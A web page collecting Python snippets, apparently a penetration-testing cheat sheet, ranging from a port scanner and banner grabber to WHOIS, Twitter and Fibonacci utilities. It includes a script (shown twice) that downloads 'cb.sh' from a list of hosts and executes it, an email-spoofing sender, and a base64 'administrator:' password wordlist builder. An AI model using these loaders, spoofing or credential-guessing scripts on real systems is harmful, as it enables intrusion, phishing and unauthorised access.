Python Scripts
(Updated: 2019-09-03) - 
Python Port Scanner - 
Base 64 WordList - 
Windows Registry - 
Search Files for Regex - 
SSL HTTP Server - 
HTTP Server - 
Email Sender - 
IP List Loop - 
HTTP Banner Grabber
Python Port Scanner
# Minimal TCP connect scan of ports 1-1023 on a single host.
import socket as sk

TARGET = '127.0.0.1'

for port in range(1, 1024):
    s = sk.socket(sk.AF_INET, sk.SOCK_STREAM)
    # settimeout() takes seconds; one second per port keeps a full sweep
    # bounded even when a port never answers.
    s.settimeout(1)
    try:
        s.connect((TARGET, port))
        print('%d:OPEN' % port)
    except sk.error:
        # Refused, unreachable or timed out: the port is not reported.
        pass
    finally:
        # Always release the descriptor, whether or not the connect worked.
        s.close()
Top - 
Home
 
Base 64 WordList
#!/usr/bin/python
# Build a wordlist of base64-encoded "administrator:<password>" strings, one
# per line, from a plain-text password list.
import base64

# NOTE(review): the ".1st" extensions may be a transcription of ".lst"; the
# names are left unchanged -- confirm against the intended files.
with open("pwd.1st", "r") as file1, open("b64pwds.1st", "w") as file2:
    for line in file1:
        # Strip the line ending so it is not encoded into the credential.
        clear = "administrator:" + line.strip()
        # encodestring() terminates its output with a newline, so every
        # encoded entry lands on its own line of the output file.
        new = base64.encodestring(clear)
        file2.write(new)
Top - 
Home
 
CONVERT WINDOWS REGISTRY HEX FORMAT TO READABLE ASCII
import binascii, sys, string
# Decode the hex string passed as the first command-line argument and show
# it as text, substituting "." for every character that is not printable.
raw_chars = binascii.a2b_hex(sys.argv[1])
rendered = "".join(c if c in string.printable else "." for c in raw_chars)
print("\n" + rendered)
Top - 
Home
 
Search Files for RegEx
import glob, re
# Report the contents of every <message>...</message> element found in the
# .txt files directly under /tmp.
# DOTALL lets "." match newlines so an element may span several lines; the
# non-greedy group stops at the first closing tag.
message_re = re.compile(r'<message>(.*?)</message>', re.DOTALL)
for msg in glob.glob('/tmp/*.txt'):
    # The with-block closes the file even if reading it fails.
    with open(msg, 'r') as filer:
        data = filer.read()
    message = message_re.findall(data)
    print("File %s contains %s" % (str(msg), message))
Top - 
Home
 
SSL HTTP Server
# Create SSL cert (follow prompts for customization)
> openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes
# Create httpserver.py 
import BaseHTTPServer,SimpleHTTPServer,ssl
# Serve the current working directory over HTTPS on 192.168.1.10:443.
# certfile is the only credential handed to wrap_socket, so cert.pem
# presumably holds both the private key and the certificate -- confirm
# against the command used to generate it.
cert = "cert.pem"
httpd = BaseHTTPServer.HTTPServer(('192.168.1.10', 443),
                                  SimpleHTTPServer.SimpleHTTPRequestHandler)
# Swap the listening socket for a TLS-wrapped one before serving.
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=cert, server_side=True)
httpd.serve_forever()
Top - 
Home
 
HTTP Server
> python -m SimpleHTTPServer 8080
Top - 
Home
 
PYTHON EMAIL SENDER (* SENDMAIL MUST BE INSTALLED)
#!/usr/bin/python
import smtplib, string
import os, time

# Message parameters.
HOST = "localhost"
SUBJECT = "Email from spoofed sender"
TO = "target@you.com"
FROM = "spoof@spoof.com"
TEXT = "Message Body"

# Headers, a blank separator line, then the body, joined with CRLF.
BODY = "\r\n".join([
    "From: %s" % FROM,
    "To: %s" % TO,
    "Subject: %s" % SUBJECT,
    "",
    TEXT,
])

# Start the local sendmail service and give it a few seconds to come up.
os.system("/etc/init.d/sendmail start")
time.sleep(4)

server = smtplib.SMTP(HOST)
server.sendmail(FROM, [TO], BODY)
server.quit()

# Wait again before shutting the service down.
time.sleep(4)
os.system("/etc/init.d/sendmail stop")
LOOP THROUGH IP LIST, DOWNLOAD FILE OVER HTTP AND EXECUTE 
#!/usr/bin/python
import urllib2, os
# Try each host in turn until one serves the payload over HTTP, save it as
# /tmp/cb.sh, then mark it executable and run it.
urls = ["1.1.1.1","2.2.2.2"]
port = "80"
payload = "cb.sh"
for host in urls:
    target = "http://" + host + ":" + port + "/" + payload
    try:
        response = urllib2.urlopen(target)
        out = open("/tmp/cb.sh","wb")
        out.write(response.read())
        out.close()
    except:
        # Any failure simply moves on to the next host.
        continue
    # The first successful download ends the search.
    break
if os.path.exists("/tmp/cb.sh"):
    for command in ("chmod 700 /tmp/cb.sh", "/tmp/cb.sh"):
        os.system(command)
Top - 
Home
 
LOOP THROUGH IP LIST, DOWNLOAD FILE OVER HTTP AND EXECUTE
#!/usr/bin/python
import urllib2, os
# Try each host in turn until one serves the payload over HTTP, save it as
# /tmp/cb.sh, then mark it executable and run it.
urls = ["1.1.1.1","2.2.2.2"]
port = "80"
payload = "cb.sh"
for host in urls:
    target = "http://" + host + ":" + port + "/" + payload
    try:
        response = urllib2.urlopen(target)
        out = open("/tmp/cb.sh","wb")
        out.write(response.read())
        out.close()
    except:
        # Any failure simply moves on to the next host.
        continue
    # The first successful download ends the search.
    break
if os.path.exists("/tmp/cb.sh"):
    for command in ("chmod 700 /tmp/cb.sh", "/tmp/cb.sh"):
        os.system(command)
Top - 
Home
 
PYTHON HTTP BANNER GRABBER (* TAKES AN IP RANGE, PORT, AND PACKET DELAY)
#!/usr/bin/python
# Request http://<ip>:<port> for every address in a last-octet range and
# print each host's Server response header (or the error that occurred).
import urllib2, sys, time
from optparse import OptionParser

parser = OptionParser()
parser.add_option("-t", dest="iprange",
                  help="target IP range, i.e. 192.168.1.1-25")
parser.add_option("-p", dest="port", default="80", help="port, default=80")
parser.add_option("-d", dest="delay", default=".5",
                  help="delay (in seconds), default=.5 seconds")
(opts, args) = parser.parse_args()
if opts.iprange is None:
    parser.error("you must supply an IP range")

# Convert once so a malformed delay fails before any request is sent.
delay = float(opts.delay)

ips = []
headers = {}
octets = opts.iprange.split('.')
if len(octets) != 4:
    parser.error("IP range must look like 192.168.1.1-25")
# The range lives in the last octet ("1-25"); a plain address without "-"
# is treated as a range of one.
start, _, stop = octets[3].partition('-')
stop = stop or start
for i in range(int(start), int(stop) + 1):
    ips.append('%s.%s.%s.%d' % (octets[0], octets[1], octets[2], i))
print('\nScanning IPs: %s\n' % (ips))

for ip in ips:
    try:
        response = urllib2.urlopen('http://%s:%s' % (ip, opts.port))
        headers[ip] = dict(response.info())
    except Exception as e:
        # Keep the failure text in place of the header dict.
        headers[ip] = "Error: " + str(e)
    time.sleep(delay)

# Report in scan order rather than dict order.
for ip in ips:
    result = headers[ip]
    if isinstance(result, dict):
        print('%s : %s' % (ip, result.get('server')))
    else:
        print('%s : %s' % (ip, result))
Top - 
Home
 
Monitor Apache IPs
# Count how many lines of the access log start with each client address.
ips = {}
# Iterate the file lazily and let the with-block close it when done.
with open("/var/log/nginx/access.log", "r") as fh:
    for line in fh:
        ip = line.split(" ")[0]
        # Only first fields of 7 to 15 characters are counted, which is the
        # length range of a dotted-quad IPv4 address.
        if 6 < len(ip) <= 15:
            ips[ip] = ips.get(ip, 0) + 1
print(ips)
 
IP WHOIS
import json
from random import randint
import socket
import struct
import sys
from docopt import docopt
import ipcalc
from ipwhois import IPWhois
import gevent
from pyelasticsearch import ElasticSearch
from pyelasticsearch.exceptions import \
     ElasticHttpError, ElasticHttpNotFoundError
import requests
def ip2long(ip):
    """
    Convert IPv4 address in string format into an integer

    :param str ip: ipv4 address
    :return: ipv4 address
    :rtype: integer
    """
    packed_ip = socket.inet_aton(ip)
    # "!L" reads the four packed bytes as one network-order unsigned integer.
    return struct.unpack("!L", packed_ip)[0]
def get_next_ip(ip_address):
    """
    Return the IPv4 address that immediately follows ``ip_address``.

    :param str ip_address: ipv4 address
    :return: next ipv4 address, or None when given 255.255.255.255
    :rtype: str

    >>> get_next_ip('0.0.0.0')
    '0.0.0.1'
    >>> get_next_ip('24.24.24.24')
    '24.24.24.25'
    >>> get_next_ip('24.24.255.255')
    '24.25.0.0'
    >>> get_next_ip('255.255.255.255') is None
    True
    """
    assert ip_address.count('.') == 3, \
           'Must be an IPv4 address in str representation'
    # The last address has no successor.
    if ip_address == '255.255.255.255':
        return None
    try:
        return socket.inet_ntoa(struct.pack('!L', ip2long(ip_address) + 1))
    except Exception:
        print('Unable to get next IP for %s' % ip_address)
        # Bare raise keeps the original traceback.
        raise
def get_netrange_end(asn_cidr):
    """
    Return the last address of the network described by ``asn_cidr``.

    :param str asn_cidr: ASN CIDR
    :return: ipv4 address of last IP in netrange
    :rtype: str
    :raises ValueError: re-raised when the network size cannot be calculated
    """
    try:
        # First host address plus the network size, less two.
        last_in_netrange = \
            ip2long(str(ipcalc.Network(asn_cidr).host_first())) + \
            ipcalc.Network(asn_cidr).size() - 2
    except ValueError:
        print('Issue calculating size of %s network' % asn_cidr)
        # Bare raise keeps the original traceback.
        raise
    return socket.inet_ntoa(struct.pack('!L', last_in_netrange))
def get_next_undefined_address(ip):
    """
    Get the next non-private IPv4 address if the address sent is private

    :param str ip: IPv4 address
    :return: ipv4 address of next non-private address; ``ip`` itself when it
             is in none of the listed networks; None when ``ip`` is rejected
             by ipcalc
    :rtype: str

    >>> get_next_undefined_address('0.0.0.0')
    '1.0.0.0'
    >>> get_next_undefined_address('24.24.24.24')
    '24.24.24.24'
    >>> get_next_undefined_address('127.0.0.1')
    '128.0.0.0'
    >>> get_next_undefined_address('255.255.255.256') is None
    True
    """
    try:
        # Should weed out many invalid IP addresses
        ipcalc.Network(ip)
    except ValueError:
        return None
    # NOTE(review): 172.16.0.0/12 and 100.64.0.0/10 are not in this list --
    # confirm whether that is intentional.
    defined_networks = (
        '0.0.0.0/8',
        '10.0.0.0/8',
        '127.0.0.0/8',
        '169.254.0.0/16',
        '192.0.0.0/24',
        '192.0.2.0/24',
        '192.88.99.0/24',
        '192.168.0.0/16',
        '198.18.0.0/15',
        '198.51.100.0/24',
        '203.0.113.0/24',
        '224.0.0.0/4',
        '240.0.0.0/4',
        '255.255.255.255/32',
    )
    for network_cidr in defined_networks:
        if ip in ipcalc.Network(network_cidr):
            # Jump to the first address after the matching network; the
            # result is not re-checked against the remaining networks.
            return get_next_ip(get_netrange_end(network_cidr))
    return ip
def break_up_ipv4_address_space(num_threads=8):
    """
    Split the IPv4 address space into ``num_threads`` consecutive ranges
    aligned on first-octet boundaries.

    When 256 is not a multiple of ``num_threads`` the final range absorbs the
    remainder, so the ranges always end at 255.255.255.255.

    :param int num_threads: number of ranges to produce, from 1 to 256
    :return: list of (first address, last address) tuples
    :rtype: list
    :raises ValueError: if num_threads is outside 1..256

    >>> break_up_ipv4_address_space() == \
     [('0.0.0.0', '31.255.255.255'), ('32.0.0.0', '63.255.255.255'),\
     ('64.0.0.0', '95.255.255.255'), ('96.0.0.0', '127.255.255.255'),\
     ('128.0.0.0', '159.255.255.255'), ('160.0.0.0', '191.255.255.255'),\
     ('192.0.0.0', '223.255.255.255'), ('224.0.0.0', '255.255.255.255')]
    True
    """
    # There are only 256 first-octet values to hand out.
    if not 1 <= num_threads <= 256:
        raise ValueError('num_threads must be between 1 and 256')
    ranges = []
    # Floor division keeps the octet arithmetic integral on Python 2 and 3.
    multiplier = 256 // num_threads
    for marker in range(num_threads):
        starting_class_a = marker * multiplier
        if marker == num_threads - 1:
            # The last range takes whatever the division left over.
            ending_class_a = 255
        else:
            ending_class_a = (marker + 1) * multiplier - 1
        ranges.append(('%d.0.0.0' % starting_class_a,
                       '%d.255.255.255' % ending_class_a))
    return ranges
def get_netranges(starting_ip='1.0.0.0',
                  last_ip='2.0.0.0',
                  elastic_search_url='http://127.0.0.1:9200/',
                  index_name='netblocks',
                  doc_name='netblock', sleep_min=1, sleep_max=5):
    """
    Walk the addresses from ``starting_ip`` to ``last_ip``, look up the WHOIS
    record covering each one and index one document per netblock.

    After every lookup the walk jumps to the address following the end of the
    netblock just found, or to the next single address when the lookup fails
    or yields no usable range, and sleeps a random number of seconds.

    :param str starting_ip: first ipv4 address to look up
    :param str last_ip: the walk stops once the current address is above this
    :param str elastic_search_url: URL handed to the ElasticSearch client
    :param str index_name: index the netblock documents are written to
    :param str doc_name: document type used when indexing
    :param int sleep_min: lower bound, in seconds, of the pause between lookups
    :param int sleep_max: upper bound, in seconds, of the pause between lookups
    :return: None
    :raises ElasticHttpError: re-raised when a record cannot be saved
    """
    connection = ElasticSearch(elastic_search_url)
    current_ip = starting_ip
    while True:
        # See if we've finished the range of work
        if ip2long(current_ip) > ip2long(last_ip):
            return
        current_ip = get_next_undefined_address(current_ip)
        if current_ip is None: # No more undefined ip addresses
            return
        print(current_ip)
        try:
            whois_resp = IPWhois(current_ip).lookup_rws()
        except Exception as error:
            # If a message like: 'STDERR: getaddrinfo(whois.apnic.net): Name
            # or service not known' appears then print it out and try the
            # next IP address.
            print('%s %s' % (type(error), error))
            current_ip = get_next_ip(current_ip)
            if current_ip is None:
                return # No more undefined ip addresses
            gevent.sleep(randint(sleep_min, sleep_max))
            continue
        if 'asn_cidr' in whois_resp and \
            whois_resp['asn_cidr'] is not None and \
            whois_resp['asn_cidr'].count('.') == 3:
            last_netrange_ip = get_netrange_end(whois_resp['asn_cidr'])
        else:
            # No usable ASN CIDR: fall back to the end of the first net's
            # "start - end" range string.
            try:
                last_netrange_ip = \
                    whois_resp['nets'][0]['range'].split('-')[-1].strip()
                assert last_netrange_ip.count('.') == 3
            except Exception:
                # Any lookup/format failure here (not interpreter-exit
                # signals such as KeyboardInterrupt) means no range was found.
                # No match found for n + 192.0.1.0.
                print('Missing ASN CIDR in whois resp: %s' %  whois_resp)
                current_ip = get_next_ip(current_ip)
                if current_ip is None:
                    return # No more undefined ip addresses
                gevent.sleep(randint(sleep_min, sleep_max))
                continue
        assert last_netrange_ip is not None and \
               last_netrange_ip.count('.') == 3, \
               'Unable to find last netrange ip for %s: %s' % (current_ip,
                                                               whois_resp)
        # Save current_ip and whois_resp
        entry = {
            'netblock_start': current_ip,
            'netblock_end': last_netrange_ip,
            'block_size': ip2long(last_netrange_ip) - ip2long(current_ip) + 1,
            'whois': json.dumps(whois_resp),
        }
        keys = ('cidr', 'name', 'handle', 'range', 'description',
                'country', 'state', 'city', 'address', 'postal_code',
                'abuse_emails', 'tech_emails', 'misc_emails', 'created',
                'updated')
        # Copy the selected fields of the first net; missing or empty values
        # are stored as None.
        for _key in keys:
            entry[_key] = str(whois_resp['nets'][0][_key]) \
                          if _key in whois_resp['nets'][0] and \
                             whois_resp['nets'][0][_key] else None
            # City names are stored with underscores instead of spaces.
            if _key == 'city' and entry[_key] and ' ' in entry[_key]:
                entry[_key] = entry[_key].replace(' ', '_')
        try:
            connection.index(index_name, doc_name, entry)
        except ElasticHttpError:
            print('At %s. Unable to save record: %s' % (current_ip, entry))
            # Bare raise keeps the original traceback.
            raise
        current_ip = get_next_ip(last_netrange_ip)
        if current_ip is None:
            return # No more undefined ip addresses
        gevent.sleep(randint(sleep_min, sleep_max))
def stats(elastic_search_url, index_name, doc_name):
    """
    Print, for the country and city fields in turn, the summed block_size
    of the indexed netblocks per value, largest first.

    :param str elastic_search_url: base URL of the search server
    :param str index_name: index that is queried
    :param str doc_name: accepted but not used by this function
    """
    url = '%s/%s/_search?fields=aggregations' % (elastic_search_url, index_name)
    for field in ('country', 'city'):
        # Terms aggregation on the field, ordered by the nested sum.
        terms_agg = {"field": field, "order": {"total_ips": "desc"}}
        sum_agg = {"total_ips": {"sum": {"field": "block_size"}}}
        data = {"aggs": {field: {"terms": terms_agg, "aggs": sum_agg}}}
        resp = requests.get(url, data=json.dumps(data))
        assert resp.status_code == 200, \
            'Did not get HTTP 200 back: %s' % resp.status_code
        buckets = json.loads(resp.content)["aggregations"][field]["buckets"]
        totals = {}
        for bucket in buckets:
            totals[bucket['key']] = int(bucket['total_ips']['value'])
        print('Top 10 netblock locations by %s' % field)
        for name in sorted(totals, key=totals.get, reverse=True):
            # Underscores in stored names are shown as spaces.
            print("{:14,d}".format(totals[name]) + ' ' + name.replace('_', ' '))
        print('')
def main(argv):
    """
    Parse the command line with docopt and run the selected sub-commands.

    :param list argv: command line arguments without the program name
    """
    opt = docopt(__doc__, argv)
    if opt['collect']:
        # Each sleep bound falls back to a random 1-5 when not given.
        sleep_min = opt['--sleep_min']
        sleep_min = randint(1, 5) if sleep_min is None else int(sleep_min)
        sleep_max = opt['--sleep_max']
        sleep_max = randint(1, 5) if sleep_max is None else int(sleep_max)
        num_threads = int(opt['--threads'])
        # Put the bounds in ascending order.
        sleep_min, sleep_max = min(sleep_min, sleep_max), \
                               max(sleep_min, sleep_max)
        # One greenlet per slice of the address space.
        threads = []
        for first_ip, final_ip in break_up_ipv4_address_space(num_threads):
            threads.append(gevent.spawn(get_netranges, first_ip, final_ip,
                                        opt['<elastic_search_url>'],
                                        opt['<index_name>'],
                                        opt['<doc_name>'],
                                        sleep_min, sleep_max))
        gevent.joinall(threads)
    if opt['stats']:
        stats(opt['<elastic_search_url>'],
              opt['<index_name>'],
              opt['<doc_name>'])
    if opt['test']:
        import doctest
        doctest.testmod()
if __name__ == "__main__":
    # Ctrl-C ends the run quietly instead of printing a traceback.
    try:
        main(sys.argv[1:])
    except KeyboardInterrupt:
        pass
 
Download Tweets
#!/usr/bin/env python
# encoding: utf-8
import tweepy #https://github.com/tweepy/tweepy
import csv
#Twitter API credentials
# All four are empty placeholders. get_all_tweets() passes the consumer pair
# to tweepy.OAuthHandler and the access pair to set_access_token.
consumer_key = ""
consumer_secret = ""
access_key = ""
access_secret = ""
def get_all_tweets(screen_name):
  """
  Download a user's timeline and write it to ``<screen_name>_tweets.csv``.

  Twitter only allows access to a user's most recent 3240 tweets with this
  method. The CSV has the columns id, created_at and text; an account with
  no tweets produces a file holding only that header row.

  :param str screen_name: account whose tweets are downloaded
  """
  #authorize twitter, initialize tweepy
  auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
  auth.set_access_token(access_key, access_secret)
  api = tweepy.API(auth)

  #initialize a list to hold all the tweepy Tweets
  alltweets = []

  #make initial request for most recent tweets (200 is the maximum allowed count)
  new_tweets = api.user_timeline(screen_name = screen_name,count=200)

  #save most recent tweets
  alltweets.extend(new_tweets)

  #keep grabbing tweets until there are no tweets left to grab
  while new_tweets:
    #id of the oldest tweet so far, less one; computed inside the loop so an
    #empty first page never indexes into an empty list
    oldest = alltweets[-1].id - 1
    print("getting tweets before %s" % (oldest))

    #all subsequent requests use the max_id param to prevent duplicates
    new_tweets = api.user_timeline(screen_name = screen_name,count=200,max_id=oldest)

    #save most recent tweets
    alltweets.extend(new_tweets)

    print("...%s tweets downloaded so far" % (len(alltweets)))

  #transform the tweepy tweets into a 2D array that will populate the csv
  outtweets = [[tweet.id_str, tweet.created_at, tweet.text.encode("utf-8")] for tweet in alltweets]

  #write the csv
  with open('%s_tweets.csv' % screen_name, 'wb') as f:
    writer = csv.writer(f)
    writer.writerow(["id","created_at","text"])
    writer.writerows(outtweets)
if __name__ == '__main__':
  #pass in the username of the account you want to download
  get_all_tweets("thealicesmith")
 
Current Date and Time
import datetime
# Show the current local date and time three ways: str(), the individual
# attributes, and a strftime pattern.
now = datetime.datetime.now()
print('')
print("Current date and time using str method of datetime object:")
print(str(now))
print('')
print("Current date and time using instance attributes:")
for template, value in (
        ("Current year: %d", now.year),
        ("Current month: %d", now.month),
        ("Current day: %d", now.day),
        ("Current hour: %d", now.hour),
        ("Current minute: %d", now.minute),
        ("Current second: %d", now.second),
        ("Current microsecond: %d", now.microsecond)):
    print(template % value)
print('')
print("Current date and time using strftime:")
print(now.strftime("%Y-%m-%d %H:%M"))
 
Check Log File
#!/usr/bin/env python
# Print every syslog line split on whitespace, followed by a tuple of its
# first three fields and its fifth field.
with open("/var/log/syslog", "r") as logfile:
    for line in logfile:
        line_split = line.split()
        print(line_split)
        # Blank or truncated lines have no fifth field to pick out.
        if len(line_split) < 5:
            continue
        # Named "fields" so the builtin list() is not shadowed.
        fields = line_split[0], line_split[1], line_split[2], line_split[4]
        print(fields)
 
All WHOIS
# Uses pyWhois to parse WHOIS database for entered domain
import sys

import whois

# Test for entered arguments, else ask for domain
# A missing argument counts as an empty name instead of raising IndexError.
data = sys.argv[1] if len(sys.argv) > 1 else ""
# Anything shorter than five characters is treated as not being a domain;
# keep prompting until a long enough name is entered.
while len(data) < 5:
  data = input("Enter a domain: ").strip()
print ("Checking WHOIS Information for ", data," ...")
# Query pyWhois for information
w = whois.whois(data)
# The parsed fields live on the query result, not on the whois module.
print("Domain Name: ", w.domain_name)
print("Expiration Date: ", w.expiration_date)
# Print important information
#
#
# import whois
# w = whois.whois('yourmom.com')
# print w
# Output will look like
# creation_date: [datetime.datetime(2012, 9, 15, 0, 0), '15 Sep 2012 20:41:00']
# domain_name: ['YOURMOM.COM', 'yourmom.com']
# updated_date: 2013-08-20 00:00:00
# whois_server: whois.enom.com
# print w.expiration_date 
# print w.text
 
Fibonacci
# Print the first nterms Fibonacci numbers, starting from 0.
# Edit nterms below to change how many terms are shown.
nterms = 100
# To ask the user instead, uncomment:
#nterms = int(input("How many terms? "))
# Seed values F(0) and F(1), plus the number of terms printed so far.
n1, n2 = 0, 1
count = 0
if nterms > 1:
  print("Fibonacci sequence up to",nterms,":")
  while count < nterms:
    print(n1,end=' , ')
    # Slide the pair forward one step.
    n1, n2 = n2, n1 + n2
    count += 1
elif nterms == 1:
  print("Fibonacci sequence up to",nterms,":")
  print(n1)
else:
  # Zero or negative counts are rejected.
  print("Please enter a positive integer")
 
How to Sleep (Sample)
# How to sleep for 5 seconds in python:
import time
time.sleep(5)  # pause for 5 seconds
# How to sleep for 0.5 seconds in python:
import time
time.sleep(0.5)  # pause for half a second
 
Search Twitter
#Importing the modules
import urllib2
import json
# Fetch one account's timeline as JSON and print the text of every tweet.
# NOTE(review): this is an unauthenticated "/1/" endpoint; presumably it is
# no longer served -- confirm before relying on this snippet.
screen_name = "wordpress"
timeline_endpoint = "http://api.twitter.com/1/statuses/user_timeline.json?screen_name="
response = urllib2.urlopen(timeline_endpoint + screen_name)
tweets = json.load(response)
print("%d %s" % (len(tweets), "tweets"))
for text in (entry['text'] for entry in tweets):
    print(text)